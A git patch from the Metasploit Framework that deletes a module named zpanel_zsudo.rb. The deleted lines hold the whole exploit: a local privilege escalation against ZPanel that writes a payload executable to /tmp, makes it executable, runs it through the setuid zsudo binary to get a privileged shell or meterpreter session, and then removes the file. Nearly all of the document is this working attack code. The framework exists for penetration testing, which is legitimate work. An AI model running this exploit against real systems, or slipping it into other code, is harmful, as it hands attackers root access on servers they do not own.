From b49c4c4e9e1d9fbb72e7c3e023287e0598ecd143 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Sat, 22 Jun 2013 18:28:17 -0500
Subject: [PATCH] up to date
---
modules/exploits/linux/local/zpanel_zsudo.rb | 84 --------------------
1 file changed, 84 deletions(-)
delete mode 100644 modules/exploits/linux/local/zpanel_zsudo.rb
diff --git a/modules/exploits/linux/local/zpanel_zsudo.rb b/modules/exploits/linux/local/zpanel_zsudo.rb
deleted file mode 100644
index 90cffdec60..0000000000
--- a/modules/exploits/linux/local/zpanel_zsudo.rb
+++ /dev/null
@@ -1,84 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-# http://metasploit.com/
-##
-
-require 'msf/core'
-require 'rex'
-require 'msf/core/post/common'
-require 'msf/core/post/file'
-require 'msf/core/post/linux/priv'
-require 'msf/core/exploit/exe'
-
-
-class Metasploit4 < Msf::Exploit::Local
- Rank = ExcellentRanking
-
- include Msf::Exploit::EXE
- include Msf::Post::File
- include Msf::Post::Common
-
- def initialize(info={})
- super( update_info( info, {
- 'Name' => 'ZPanel zsudo Local Privilege Escalation Exploit',
- 'Description' => %q{
- This module abuses the zsudo binary installed with zpanel to get a privileged
- session if a session with privileges in the sudoers file to execute it is
- granted. This module is useful for post exploitation of ZPanel vulnerabilities
- where typically web server privileges are acquired, and this user is allowed to
- execute zsudo on the sudoers file.
- },
- 'License' => MSF_LICENSE,
- 'Author' => [ 'sinn3r' ],
- 'DisclosureDate' => 'Jun 07 2013',
- 'Platform' => [ 'unix', 'linux'],
- 'Arch' => [ ARCH_CMD, ARCH_X86 ],
- 'SessionTypes' => [ 'shell', 'meterpreter' ],
- 'Targets' =>
- [
- [ 'Command payload', { 'Arch' => ARCH_CMD } ],
- [ 'Linux x86', { 'Arch' => ARCH_X86 } ]
- ],
- 'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
- 'DefaultTarget' => 0,
- }
- ))
- register_options([
- # These are not OptPath becuase it's a *remote* path
- OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
- OptString.new("zsudo", [ true, "Path to zsudo executable", "/etc/zpanel/panel/bin/zsudo" ]),
- ], self.class)
- end
-
- def check
- stat = session.fs.file.stat(datastore["zsudo"])
- if stat and stat.file? and stat.setuid?
- print_good("#{stat.prettymode} #{datastore["zsudo"]}")
- return CheckCode::Vulnerable
- end
- return CheckCode::Safe
- end
-
- def exploit
- exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.elf"
- if (target.arch.include? ARCH_CMD)
- write_file(exe_file, payload.encoded)
- else
- write_file(exe_file, generate_payload_exe)
- end
-
- cmd_exec "chmod +x #{exe_file}"
-
- print_status("running")
-
- begin
- cmd_exec "#{datastore["zsudo"]} #{exe_file}}"
- ensure
- cmd_exec "rm -f #{exe_file}"
- end
-
- end
-end
-